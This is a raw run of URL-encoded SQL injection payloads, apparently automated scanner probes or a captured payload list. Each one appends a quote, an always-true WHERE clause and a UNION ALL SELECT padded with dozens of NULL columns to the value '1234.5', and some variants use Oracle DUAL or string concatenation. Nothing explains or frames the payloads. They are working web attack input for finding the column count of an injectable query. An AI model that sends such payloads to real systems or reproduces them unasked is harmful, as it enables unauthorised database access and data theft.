1234.5%27%20WHERE%203731%3D3731%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%202017%3D2017%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%205110%3D5110%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%204186%3D4186%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20WHERE%202030%3D2030%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%209957%3D9957%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%206797%3D6797%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%206054%3D6054%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%201573%3D1573%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%204520%3D4520%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%202541%3D2541%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%209242%3D9242%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%201585%3D1585%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%202172%3D2172%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20WHERE%207979%3D7979%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%209174%3D9174%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%209869%3D9869%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%205233%3D5233%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%209355%3D9355%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%208486%3D8486%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%207441%3D7441%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%205996%3D5996%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%208590%3D8590%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%201105%3D1105%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%20WHERE%201064%3D1064%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27KyMC%27%20FROM%20DUAL%20WHERE%208140%3D8140%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27Mvtq%27%20FROM%20DUAL%20WHERE%205554%3D5554%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27yLof%27%20FROM%20DUAL%20WHERE%209983%3D9983%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27vFJP%27%20FROM%20DUAL%20WHERE%204759%3D4759%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27aZsw%27%20FROM%20DUAL%20WHERE%202519%3D2519%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27ENls%27%20FROM%20DUAL%20WHERE%209694%3D9694%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27tdYi%27%20FROM%20DUAL%20WHERE%208389%3D8389%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27ucBh%27%20FROM%20DUAL%20WHERE%204999%3D4999%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27zMVf%27%20FROM%20DUAL%20WHERE%205008%3D5008%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27vizQ%27%20FROM%20DUAL%20WHERE%204781%3D4781%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27ZcgA%27%20WHERE%203050%3D3050%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27lvka%27%20WHERE%201049%3D1049%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27dYOY%27%20WHERE%204119%3D4119%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27hmwD%27%20WHERE%204477%3D4477%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27aoyn%27%20WHERE%208126%3D8126%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27BDzO%27%20WHERE%201578%3D1578%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27aSuR%27%20WHERE%206299%3D6299%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27oeni%27%20WHERE%207092%3D7092%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27fsDb%27%20WHERE%202888%3D2888%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%7C%7C%28SELECT%20%27uehQ%27%20WHERE%209118%3D9118%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20yGWU%20WHERE%206461%3D6461%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 